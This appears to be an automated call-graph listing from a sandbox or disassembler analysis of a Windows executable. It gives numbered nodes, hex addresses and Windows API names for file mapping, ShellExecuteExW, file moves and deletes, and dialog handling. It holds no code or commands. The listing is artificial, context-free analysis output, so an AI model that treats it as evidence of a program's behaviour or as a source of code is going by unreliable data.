24904->24909 24910 37dde5 24904->24910 24905->24824 25155 37be55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24906->25155 24911 37ea07 121 API calls 24907->24911 24909->24910 24920 37de6b 24910->24920 24922 37ddf5 GetTickCount 24910->24922 24966 37de5c 24910->24966 24911->24881 24913 37e4e5 25158 361323 GetDlgItem EnableWindow 24913->25158 24918 370597 53 API calls 24914->24918 24933 37e22e 24914->24933 24915->24903 24916->24856 24923 37e211 24918->24923 24919 37e097 25043 361341 GetDlgItem ShowWindow 24919->25043 24926 37e03c 24920->24926 24928 37de84 GetModuleFileNameW 24920->24928 24929 37e032 24920->24929 25156 37be55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24921->25156 24930 364c00 _swprintf 51 API calls 24922->24930 24924 364c00 _swprintf 51 API calls 24923->24924 24924->24933 24936 370597 53 API calls 24926->24936 25138 3712bc 82 API calls 24928->25138 24929->24830 24929->24926 24939 37de12 24930->24939 24931 37e3a7 24931->24899 24932->24881 24933->24898 24934 37e4bd 24934->24886 24943 37e046 24936->24943 24940 37e3e1 24937->24940 24938 37e0a7 25044 361341 GetDlgItem ShowWindow 24938->25044 25026 36b01e 24939->25026 24940->24907 24946 37e3ea DialogBoxParamW 24940->24946 24942 37deac 24944 364c00 _swprintf 51 API calls 24942->24944 24945 364c00 _swprintf 51 API calls 24943->24945 24949 37dece CreateFileMappingW 24944->24949 24951 37e064 24945->24951 24946->24830 24946->24907 24947 37e0b1 24948 370597 53 API calls 24947->24948 24953 37e0bb SetDlgItemTextW 24948->24953 24952 37df2c GetCommandLineW 24949->24952 24986 37dfa3 __InternalCxxFrameHandler 24949->24986 24962 370597 53 API calls 24951->24962 24957 37df3d 24952->24957 25045 361341 GetDlgItem ShowWindow 24953->25045 24955 37dfae ShellExecuteExW 24981 37dfc9 24955->24981 25139 37d705 SHGetMalloc 24957->25139 24958 37de3f GetLastError 24959 37de4a 24958->24959 25036 36af2f 24959->25036 24965 37e07e 24962->24965 24963 37e0cd SetDlgItemTextW GetDlgItem 24967 37e102 24963->24967 24968 37e0ea GetWindowLongW SetWindowLongW 24963->24968 24964 37df59 25140 37d705 SHGetMalloc 24964->25140 24966->24919 24966->24920 25046 37ea07 24967->25046 24968->24967 24972 37df65 25141 37d705 SHGetMalloc 24972->25141 24973 37ea07 121 API calls 24976 37e11e 24973->24976 24975 37e00c 24975->24929 24979 37e022 UnmapViewOfFile CloseHandle 24975->24979 25077 37fdf7 24976->25077 24977 37df71 25142 37136b 24977->25142 24979->24929 24981->24975 24984 37dff8 Sleep 24981->24984 24984->24975 24984->24981 24986->24955 24990->24830 24990->24853 24993 36136f 24992->24993 24994 3613c8 24992->24994 24995 3613d5 24993->24995 25159 370244 62 API calls 3 library calls 24993->25159 25160 37021d GetWindowLongW SetWindowLongW 24994->25160 24995->24821 24995->24822 24995->24905 24998 361391 24998->24995 24999 3613a4 GetDlgItem 24998->24999 24999->24995 25000 3613b4 24999->25000 25000->24995 25001 3613ba SetWindowTextW 25000->25001 25001->24995 25003 37d864 5 API calls 25002->25003 25004 37f817 GetDlgItem 25003->25004 25005 37f836 25004->25005 25006 37f86e SendMessageW SendMessageW 25004->25006 25009 37f841 ShowWindow SendMessageW SendMessageW 25005->25009 25007 37f8ae 25006->25007 25008 37f8cd SendMessageW SendMessageW SendMessageW 25006->25008 25007->25008 25010 37f924 SendMessageW 25008->25010 25011 37f901 SendMessageW 25008->25011 25009->25006 25012 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25010->25012 25011->25010 25013 37dd62 25012->25013 25013->24872 25133 37ff24 5 API calls 2 library calls 25013->25133 25016 36bafb 25014->25016 25015 36bbd0 25017 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25015->25017 25016->25015 25019 36bba8 25016->25019 25021 36bbf9 25016->25021 25161 36bee1 25016->25161 25018 36bbf0 25017->25018 25018->24894 25018->24895 25019->25015 25020 36bee1 13 API calls 25019->25020 25020->25015 25176 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25021->25176 25024 36bbfe 25025->24904 25027 36b028 25026->25027 25028 36b096 CreateFileW 25027->25028 25029 36b08d 25027->25029 25028->25029 25030 36b0dd 25029->25030 25031 36da1e 6 API calls 25029->25031 25034 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25030->25034 25032 36b0c2 25031->25032 25032->25030 25033 36b0c6 CreateFileW 25032->25033 25033->25030 25035 36b111 25034->25035 25035->24958 25035->24959 25037 36af6e 25036->25037 25038 36af5d 25036->25038 25037->24966 25038->25037 25039 36af70 25038->25039 25040 36af69 25038->25040 25200 36afd0 25039->25200 25195 36b11a 25040->25195 25043->24938 25044->24947 25045->24963 25047 37ea19 25046->25047 25048 37f717 25047->25048 25217 37d5dd 25047->25217 25049 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25048->25049 25051 37e110 25049->25051 25051->24973 25052 37d5dd 6 API calls 25060 37ea7c _wcslen _wcsrchr 25052->25060 25053 37ed57 SetWindowTextW 25053->25060 25059 37eb4b SetFileAttributesW 25062 37ec05 GetFileAttributesW 25059->25062 25076 37eb65 _abort _wcslen 25059->25076 25060->25048 25060->25052 25060->25053 25060->25059 25068 37f73c 25060->25068 25073 37ef75 SendMessageW 25060->25073 25223 37d41c 25060->25223 25242 37c5dd GetCurrentDirectoryW 25060->25242 25243 36dd18 25060->25243 25248 36c3de 11 API calls 25060->25248 25249 36c367 FindClose 25060->25249 25250 37d76e 76 API calls 3 library calls 25060->25250 25251 3866ae 25060->25251 25062->25060 25064 37ec17 DeleteFileW 25062->25064 25064->25060 25066 37ec28 25064->25066 25070 364c00 _swprintf 51 API calls 25066->25070 25067 37ef35 GetDlgItem SetWindowTextW SendMessageW 25067->25060 25264 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25068->25264 25072 37ec48 GetFileAttributesW 25070->25072 25071 37f741 25072->25066 25074 37ec5d MoveFileW 25072->25074 25073->25060 25074->25060 25075 37ec75 MoveFileExW 25074->25075 25075->25060 25076->25060 25076->25062 25247 36d8ac 51 API calls 2 library calls 25076->25247 25078 37fe13 25077->25078 25276 3726df 25078->25276 25080 37fe59 25280 368ddf 25080->25280 25082 37feb7 25290 368ff5 25082->25290 25090 37f9f8 25089->25090 25845 37c556 25090->25845 25093 37fae1 25095 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25093->25095 25094 37fa1b GetWindow 25094->25093 25098 37fa34 25094->25098 25096 37e256 25095->25096 25096->24831 25096->24832 25097 37fa41 GetClassNameW 25097->25098 25098->25093 25098->25097 25099 37fa65 GetWindowLongW 25098->25099 25100 37fac9 GetWindow 25098->25100 25099->25100 25101 37fa75 SendMessageW 25099->25101 25100->25093 25100->25098 25101->25100 25102 37fa8b GetObjectW 25101->25102 25850 37c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25102->25850 25104 37faa2 25851 37c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25104->25851 25852 37c79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25104->25852 25107 37fab3 SendMessageW DeleteObject 25107->25100 25108->24847 25110 37cb74 25109->25110 25115 37cb99 25109->25115 25114 37cb8b FindWindowExW 25110->25114 25110->25115 25111 37cba7 25113 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25111->25113 25112 37cb9e SHAutoComplete 25112->25111 25116 37cbb2 25113->25116 25114->25115 25115->25111 25115->25112 25117 37d243 25116->25117 25118 37d255 25117->25118 25119 36147c 43 API calls 25118->25119 25120 37d2af 25119->25120 25855 3620eb 25120->25855 25123 37d2c5 25125 3616b8 86 API calls 25123->25125 25124 37d2d1 25862 361b0e 25124->25862 25127 37d2cd 25125->25127 25128 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25127->25128 25131 37d357 25128->25131 25129 37d2ed __InternalCxxFrameHandler ___std_exception_copy 25130 3616b8 86 API calls 25129->25130 25130->25127 25131->24874 25131->24878 25132->24856 25133->24872 25934 36bcdd 25134->25934 25137->24877 25138->24942 25139->24964 25140->24972 25141->24977 25143 371383 25142->25143 25144 371379 25142->25144 25146 37139d 25143->25146 25147 3713f8 GetCurrentProcessId 25143->25147 25944 3712f6 25144->25944 25148 3713d2 MapViewOfFile 25146->25148 25950 367bad 76 API calls 2 library calls 25146->25950 25147->25148 25148->24986 25150 3713c0 25951 367d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25150->25951 25152 3713c9 25952 367ba8 RaiseException std::_Xinvalid_argument 25152->25952 25155->24931 25156->24934 25157->24913 25158->24901 25159->24998 25160->24995 25162 36beee 25161->25162 25163 36bf1c 25162->25163 25164 36bf0f CreateDirectoryW 25162->25164 25165 36bccb 8 API calls 25163->25165 25164->25163 25166 36bf4f 25164->25166 25167 36bf22 25165->25167 25169 36bf5e 25166->25169 25183 36c2e5 25166->25183 25168 36bf62 GetLastError 25167->25168 25177 36da1e 25167->25177 25168->25169 25173 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25169->25173 25175 36bf85 25173->25175 25174 36bf3c CreateDirectoryW 25174->25166 25174->25168 25175->25016 25176->25024 25180 36da28 _wcslen 25177->25180 25178 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25179 36bf38 25178->25179 25179->25168 25179->25174 25181 36daf7 GetCurrentDirectoryW 25180->25181 25182 36da6f _wcslen 25180->25182 25181->25182 25182->25178 25193 381590 25183->25193 25186 36c314 25188 36da1e 6 API calls 25186->25188 25187 36c33f 25189 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25187->25189 25191 36c326 25188->25191 25190 36c34d 25189->25190 25190->25169 25191->25187 25192 36c32a SetFileAttributesW 25191->25192 25192->25187 25194 36c2f2 SetFileAttributesW 25193->25194 25194->25186 25194->25187 25196 36b14d 25195->25196 25199 36b123 25195->25199 25196->25037 25199->25196 25206 36bc65 25199->25206 25201 36afdc 25200->25201 25202 36affa 25200->25202 25201->25202 25204 36afe8 FindCloseChangeNotification 25201->25204 25203 36b019 25202->25203 25216 367b49 76 API calls 25202->25216 25203->25037 25204->25202 25207 381590 25206->25207 25208 36bc72 DeleteFileW 25207->25208 25209 36bc91 25208->25209 25210 36bcb9 25208->25210 25212 36da1e 6 API calls 25209->25212 25211 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25210->25211 25213 36b14b 25211->25213 25214 36bca3 25212->25214 25213->25037 25214->25210 25215 36bca7 DeleteFileW 25214->25215 25215->25210 25216->25203 25220 37d5e7 25217->25220 25218 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25219 37d6fc 25218->25219 25219->25060 25221 37d6bc ExpandEnvironmentStringsW 25220->25221 25222 37d6df 25220->25222 25221->25222 25222->25218 25226 37d42e 25223->25226 25224 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25225 37d4f6 25224->25225 25225->25067 25227 37d4ba 25226->25227 25228 37d500 25226->25228 25227->25224 25265 3813f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25228->25265 25230 37d505 25231 361366 66 API calls 25230->25231 25232 37d556 25231->25232 25233 37d574 25232->25233 25234 37d5b5 SetDlgItemTextW 25232->25234 25235 37d562 25232->25235 25236 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25233->25236 25234->25233 25235->25233 25237 37d583 GetDlgItemTextW 25235->25237 25241 37d56f 25235->25241 25238 37d5d4 25236->25238 25266 371421 25237->25266 25238->25067 25240 37d57a EndDialog 25240->25233 25241->25233 25241->25240 25242->25060 25244 36dd22 25243->25244 25245 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25244->25245 25246 36dda6 25245->25246 25246->25060 25247->25076 25248->25060 25249->25060 25250->25060 25252 38bb34 25251->25252 25253 38bb4c 25252->25253 25254 38bb41 25252->25254 25256 38bb54 25253->25256 25262 38bb5d _free 25253->25262 25255 38bc8e __vsnwprintf_l 21 API calls 25254->25255 25257 38bb49 25255->25257 25258 38bafa _free 20 API calls 25256->25258 25257->25060 25258->25257 25259 38bb62 25274 38bc7b 20 API calls _free 25259->25274 25260 38bb87 HeapReAlloc 25260->25257 25260->25262 25262->25259 25262->25260 25275 38a2ec 7 API calls 2 library calls 25262->25275 25264->25071 25265->25230 25267 37142a _wcslen 25266->25267 25268 371455 25267->25268 25270 371334 25267->25270 25268->25241 25271 371342 __InternalCxxFrameHandler 25270->25271 25272 37136b 82 API calls 25271->25272 25273 371366 25272->25273 25273->25268 25274->25257 25275->25262 25277 3726ec _wcslen 25276->25277 25309 361925 25277->25309 25279 372704 25279->25080 25281 368deb __EH_prolog3 25280->25281 25322 36ee0f 25281->25322 25283 368e0e 25328 38121c 25283->25328 25285 368e52 _abort 25286 38121c 27 API calls 25285->25286 25287 368e7a 25286->25287 25341 376b0d 25287->25341 25289 368eac 25289->25082 25291 368fff 25290->25291 25292 369080 25291->25292 25375 36c37a 25291->25375 25295 3690e5 25292->25295 25352 3696b9 25292->25352 25294 369127 25297 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25294->25297 25295->25294 25381 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25295->25381 25298 36914e 25297->25298 25300 368ebb 25298->25300 25836 36ab26 8 API calls _abort 25300->25836 25302 368ee6 25304 368ef7 Concurrency::cancel_current_task 25302->25304 25837 374396 25302->25837 25305 362179 26 API calls 25304->25305 25306 368f1e 25305->25306 25843 36eea4 86 API calls Concurrency::cancel_current_task 25306->25843 25310 36198f 25309->25310 25311 361937 25309->25311 25310->25279 25312 361960 25311->25312 25319 367bad 76 API calls 2 library calls 25311->25319 25314 3866ae 22 API calls 25312->25314 25316 361980 25314->25316 25315 361956 25320 367c32 75 API calls 25315->25320 25316->25310 25321 367c32 75 API calls 25316->25321 25319->25315 25320->25312 25321->25310 25323 36ee1b __EH_prolog3 25322->25323 25324 38121c 27 API calls 25323->25324 25325 36ee59 25324->25325 25326 38121c 27 API calls 25325->25326 25327 36ee7d 25326->25327 25327->25283 25330 381221 ___std_exception_copy 25328->25330 25329 38123b 25329->25285 25330->25329 25332 38123d 25330->25332 25349 38a2ec 7 API calls 2 library calls 25330->25349 25333 364adb Concurrency::cancel_current_task 25332->25333 25335 381247 25332->25335 25347 3847d0 RaiseException 25333->25347 25350 3847d0 RaiseException 25335->25350 25337 364b0d 25337->25285 25338 364af7 25338->25337 25348 3613db 26 API calls Concurrency::cancel_current_task 25338->25348 25339 381de0 25342 376b19 __EH_prolog3 25341->25342 25343 38121c 27 API calls 25342->25343 25344 376b33 25343->25344 25345 376b4a 25344->25345 25351 372f22 80 API calls 25344->25351 25345->25289 25347->25338 25348->25337 25349->25330 25350->25339 25351->25345 25353 3696d4 25352->25353 25382 36147c 25353->25382 25355 3696fb 25356 36970c 25355->25356 25545 36b982 25355->25545 25360 369743 25356->25360 25392 361b63 25356->25392 25359 36973f 25359->25360 25411 3620a1 142 API calls __EH_prolog3 25359->25411 25537 3616b8 25360->25537 25366 3697e4 25412 36988e 81 API calls 25366->25412 25368 369842 25368->25360 25416 36441e 25368->25416 25428 369906 25368->25428 25369 3697fe 25369->25368 25413 373cf2 25369->25413 25370 36976b 25370->25366 25374 36c37a 12 API calls 25370->25374 25374->25370 25376 36c38f 25375->25376 25377 36c3bd 25376->25377 25823 36c4a8 25376->25823 25377->25291 25380 36c3a4 FindClose 25380->25377 25381->25294 25383 361488 __EH_prolog3 25382->25383 25384 36ee0f 27 API calls 25383->25384 25385 3614b7 25384->25385 25386 38121c 27 API calls 25385->25386 25389 36152b 25385->25389 25387 361518 25386->25387 25387->25389 25390 36668f 43 API calls 25387->25390 25549 36cc45 25389->25549 25390->25389 25391 3615b3 _abort 25391->25355 25393 361b6f __EH_prolog3 25392->25393 25403 361cef 25393->25403 25405 361bbc 25393->25405 25569 36145d 25393->25569 25396 361d21 25581 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25396->25581 25398 36441e 116 API calls 25402 361d6c 25398->25402 25399 361d2e 25399->25398 25399->25403 25400 361db4 25400->25403 25406 361de7 25400->25406 25582 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25400->25582 25402->25400 25404 36441e 116 API calls 25402->25404 25403->25359 25404->25402 25405->25396 25405->25399 25405->25403 25406->25403 25410 36b8c0 79 API calls 25406->25410 25407 36441e 116 API calls 25408 361e38 25407->25408 25408->25403 25408->25407 25410->25408 25411->25370 25412->25369 25598 38029f 25413->25598 25417 36442e 25416->25417 25418 36442a 25416->25418 25427 36b8c0 79 API calls 25417->25427 25418->25368 25419 364440 25420 36445b 25419->25420 25421 364469 25419->25421 25422 36449b 25420->25422 25608 363ab7 104 API calls 3 library calls 25420->25608 25609 362fcb 116 API calls 3 library calls 25421->25609 25422->25368 25425 364467 25425->25422 25610 3625f4 74 API calls 25425->25610 25427->25419 25429 369918 25428->25429 25433 36997a 25429->25433 25441 369da2 Concurrency::cancel_current_task 25429->25441 25658 37ab94 117 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25429->25658 25430 36a820 25434 36a825 25430->25434 25435 36a86c 25430->25435 25432 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25436 36a862 25432->25436 25433->25430 25438 36999b 25433->25438 25433->25441 25434->25441 25703 368c06 166 API calls 25434->25703 25435->25441 25704 37ab94 117 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25435->25704 25436->25368 25438->25441 25611 366936 25438->25611 25441->25432 25442 369a71 25617 36d63a 25442->25617 25444 369aa4 25445 369bba 25444->25445 25659 36bf89 57 API calls 4 library calls 25444->25659 25445->25441 25448 369ce2 25445->25448 25661 369582 38 API calls 25445->25661 25452 36c37a 12 API calls 25448->25452 25455 369d40 25448->25455 25451 369c24 25660 389ea8 26 API calls 2 library calls 25451->25660 25452->25455 25454 36a0ac 25670 36f014 97 API calls 25454->25670 25621 368f84 25455->25621 25458 369dd1 25477 369e33 25458->25477 25662 364916 27 API calls 2 library calls 25458->25662 25461 36a0c3 25465 36a118 25461->25465 25480 36a0ce 25461->25480 25462 36a004 25462->25461 25467 36a033 25462->25467 25473 36a09b 25465->25473 25672 3693ac 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25465->25672 25466 36a116 25469 36af2f 80 API calls 25466->25469 25470 36bccb 8 API calls 25467->25470 25467->25473 25475 36a174 25467->25475 25468 36a7d9 25471 36af2f 80 API calls 25468->25471 25469->25441 25474 36a068 25470->25474 25471->25441 25473->25466 25473->25475 25474->25473 25669 36ac09 97 API calls 25474->25669 25475->25468 25492 36a1e2 25475->25492 25673 36b288 25475->25673 25476 369f71 25667 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25476->25667 25477->25441 25477->25476 25487 369f78 Concurrency::cancel_current_task 25477->25487 25663 368db7 41 API calls 25477->25663 25664 36f014 97 API calls 25477->25664 25665 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25477->25665 25666 36953f 98 API calls 25477->25666 25480->25466 25671 369155 123 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25480->25671 25483 36a231 25488 36c94d 27 API calls 25483->25488 25487->25462 25668 36bd61 50 API calls 3 library calls 25487->25668 25500 36a247 25488->25500 25490 36a1d0 25677 367e45 77 API calls 25490->25677 25627 36c94d 25492->25627 25493 36a31d 25494 36a511 25493->25494 25495 36a37c 25493->25495 25497 36a537 25494->25497 25498 36a523 25494->25498 25518 36a3b5 25494->25518 25496 36a43c 25495->25496 25499 36a394 25495->25499 25504 36d63a 5 API calls 25496->25504 25631 3753f0 25497->25631 25688 36ab81 25498->25688 25502 36a3db 25499->25502 25510 36a3a3 25499->25510 25500->25493 25505 36a2f4 25500->25505 25678 36b1e6 25500->25678 25502->25518 25684 3688a9 112 API calls 25502->25684 25508 36a466 25504->25508 25505->25493 25682 36b427 82 API calls 25505->25682 25506 36a550 25643 375099 25506->25643 25685 369582 38 API calls 25508->25685 25683 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25510->25683 25513 36a502 25513->25368 25517 36a47e 25517->25518 25519 36a494 25517->25519 25520 36a4ab 25517->25520 25518->25513 25523 36a5c5 25518->25523 25699 36c905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25518->25699 25686 3685fc 86 API calls 25519->25686 25687 36a8b9 103 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25520->25687 25526 36a656 25523->25526 25700 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25523->25700 25525 36a764 25525->25468 25528 36c2e5 8 API calls 25525->25528 25526->25468 25526->25525 25527 36a712 25526->25527 25652 36b949 SetEndOfFile 25526->25652 25653 36b7e2 25527->25653 25531 36a7bf 25528->25531 25531->25468 25701 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25531->25701 25532 36a759 25534 36afd0 77 API calls 25532->25534 25534->25525 25535 36a7cf 25702 367d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25535->25702 25538 3616ca 25537->25538 25539 3616dc Concurrency::cancel_current_task 25537->25539 25538->25539 25820 361729 26 API calls 25538->25820 25541 362179 26 API calls 25539->25541 25542 36170b 25541->25542 25821 36eea4 86 API calls Concurrency::cancel_current_task 25542->25821 25546 36b999 25545->25546 25547 36b9a3 25546->25547 25822 367c87 78 API calls 25546->25822 25547->25356 25550 36cc65 _abort 25549->25550 25557 36cb21 25550->25557 25555 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25556 36cc95 25555->25556 25556->25391 25564 36cb02 25557->25564 25559 36cb96 25560 362179 25559->25560 25561 362184 25560->25561 25562 362193 25560->25562 25568 3613db 26 API calls Concurrency::cancel_current_task 25561->25568 25562->25555 25565 36cb0b 25564->25565 25567 36cb10 25564->25567 25566 362179 26 API calls 25565->25566 25566->25567 25567->25559 25568->25562 25583 3618b2 25569->25583 25572 36b8c0 25573 36b8d2 25572->25573 25577 36b8e5 25572->25577 25575 36b8f0 25573->25575 25596 367cd8 77 API calls 25573->25596 25575->25405 25576 36b8f8 SetFilePointer 25576->25575 25578 36b914 GetLastError 25576->25578 25577->25575 25577->25576 25578->25575 25579 36b91e 25578->25579 25579->25575 25597 367cd8 77 API calls 25579->25597 25581->25403 25582->25406 25584 3618c4 25583->25584 25590 361476 25583->25590 25585 3618ed 25584->25585 25593 367bad 76 API calls 2 library calls 25584->25593 25586 3866ae 22 API calls 25585->25586 25588 36190a 25586->25588 25588->25590 25595 367c32 75 API calls 25588->25595 25589 3618e3 25594 367c32 75 API calls 25589->25594 25590->25572 25593->25589 25594->25585 25595->25590 25596->25577 25597->25575 25599 3802ac 25598->25599 25600 370597 53 API calls 25599->25600 25601 3802da 25600->25601 25602 364c00 _swprintf 51 API calls 25601->25602 25603 3802ec 25602->25603 25604 37f7fc 21 API calls 25603->25604 25605 3802fd 25604->25605 25606 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25605->25606 25607 373d08 25606->25607 25607->25368 25608->25425 25609->25425 25610->25422 25612 366946 25611->25612 25705 366852 25612->25705 25614 3669b1 25614->25442 25615 366979 25615->25614 25710 36d122 6 API calls 3 library calls 25615->25710 25620 36d644 25617->25620 25618 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25619 36d7d8 25618->25619 25619->25444 25620->25618 25622 368f99 25621->25622 25623 368fd1 25622->25623 25721 367e25 74 API calls 25622->25721 25623->25441 25623->25454 25623->25458 25625 368fc9 25722 361407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25625->25722 25628 36c95b 25627->25628 25630 36c965 25627->25630 25629 38121c 27 API calls 25628->25629 25629->25630 25630->25483 25632 375405 25631->25632 25635 37540f ___std_exception_copy 25631->25635 25723 367c32 75 API calls 25632->25723 25634 3754b9 _abort 25634->25506 25635->25634 25636 375495 25635->25636 25637 37553f 25635->25637 25724 375323 132 API calls 3 library calls 25636->25724 25725 3847d0 RaiseException 25637->25725 25640 37556b 25642 37559d 25640->25642 25726 37517f 132 API calls 25640->25726 25642->25506 25644 3750a2 25643->25644 25645 3750cb 25643->25645 25647 3750c1 25644->25647 25649 3750b7 25644->25649 25650 3750bf 25644->25650 25645->25650 25743 377576 137 API calls 2 library calls 25645->25743 25742 378250 132 API calls 25647->25742 25727 378c7e 25649->25727 25650->25518 25652->25527 25654 36b7f3 25653->25654 25656 36b802 25653->25656 25655 36b7f9 FlushFileBuffers 25654->25655 25654->25656 25655->25656 25657 36b87f SetFileTime 25656->25657 25657->25532 25658->25433 25659->25451 25660->25445 25661->25448 25662->25477 25663->25477 25664->25477 25665->25477 25666->25477 25667->25487 25668->25462 25669->25473 25670->25487 25671->25466 25672->25473 25674 36b291 GetFileType 25673->25674 25675 36a1ba 25673->25675 25674->25675 25675->25492 25676 36240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25675->25676 25676->25490 25677->25492 25679 36b1ff 25678->25679 25681 36b8c0 79 API calls 25679->25681 25680 36b231 25680->25505 25681->25680 25682->25493 25683->25518 25684->25518 25685->25517 25686->25518 25687->25518 25689 36ab8d __EH_prolog3 25688->25689 25811 368fdb 25689->25811 25692 36145d 78 API calls 25693 36ab9b 25692->25693 25694 36f0d7 132 API calls 25693->25694 25698 36abae 25694->25698 25695 36abf6 25695->25518 25697 36f0d7 132 API calls 25697->25698 25698->25695 25698->25697 25814 36f2c3 97 API calls __InternalCxxFrameHandler 25698->25814 25699->25523 25700->25526 25701->25535 25702->25468 25703->25441 25704->25441 25711 366731 25705->25711 25708 366873 25708->25615 25709 366731 6 API calls 25709->25708 25710->25615 25712 36673b 25711->25712 25713 36d63a 5 API calls 25712->25713 25719 366765 25713->25719 25714 366833 25715 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25714->25715 25716 366845 25715->25716 25716->25708 25716->25709 25717 36d63a 5 API calls 25717->25719 25719->25714 25719->25717 25720 36d122 6 API calls 3 library calls 25719->25720 25720->25719 25721->25625 25722->25623 25723->25635 25724->25634 25725->25640 25726->25640 25744 375617 25727->25744 25729 378c9d __InternalCxxFrameHandler 25731 3790ae 25729->25731 25748 36f0d7 25729->25748 25759 37306d 25729->25759 25765 375e86 132 API calls 25729->25765 25766 379111 132 API calls 25729->25766 25767 3732af 81 API calls 25729->25767 25768 375991 98 API calls __InternalCxxFrameHandler 25729->25768 25769 37976f 137 API calls __InternalCxxFrameHandler 25729->25769 25770 37725b 98 API calls __InternalCxxFrameHandler 25731->25770 25733 3790be __InternalCxxFrameHandler 25734 3810f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25733->25734 25735 379108 25734->25735 25735->25650 25742->25650 25743->25650 25746 375623 __EH_prolog3 _abort ___std_exception_copy 25744->25746 25745 375709 25745->25729 25746->25745 25771 367c32 75 API calls 25746->25771 25756 36f0ed __InternalCxxFrameHandler 25748->25756 25749 36f25d 25750 36f291 25749->25750 25772 36f08e 25749->25772 25752 36f2b2 25750->25752 25778 366c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25750->25778 25779 372ee4 25752->25779 25756->25749 25757 36f254 25756->25757 25776 36ca4c 91 API calls __EH_prolog3 25756->25776 25777 37ab94 117 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25756->25777 25757->25729 25760 37307e 25759->25760 25761 373079 25759->25761 25763 37308e 25760->25763 25803 3732af 81 API calls 25760->25803 25795 373105 25761->25795 25763->25729 25765->25729 25766->25729 25767->25729 25768->25729 25769->25729 25770->25733 25771->25746 25773 36f096 25772->25773 25774 36f0d3 25772->25774 25773->25774 25785 373ca6 25773->25785 25774->25750 25776->25756 25777->25756 25778->25752 25780 372eeb 25779->25780 25781 372f06 25780->25781 25793 367ba8 RaiseException std::_Xinvalid_argument 25780->25793 25783 372f17 SetThreadExecutionState 25781->25783 25794 367ba8 RaiseException std::_Xinvalid_argument 25781->25794 25783->25757 25788 38017f 25785->25788 25789 3722ef 25788->25789 25790 380196 SendDlgItemMessageW 25789->25790 25791 37d864 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 25790->25791 25792 373cc6 25791->25792 25792->25774 25793->25781 25794->25783 25796 37317e 25795->25796 25797 373110 25795->25797 25796->25760 25797->25796 25798 373115 CreateThread 25797->25798 25800 37316d SetThreadPriority 25797->25800 25804 367bad 76 API calls 2 library calls 25797->25804 25805 367d49 76 API calls 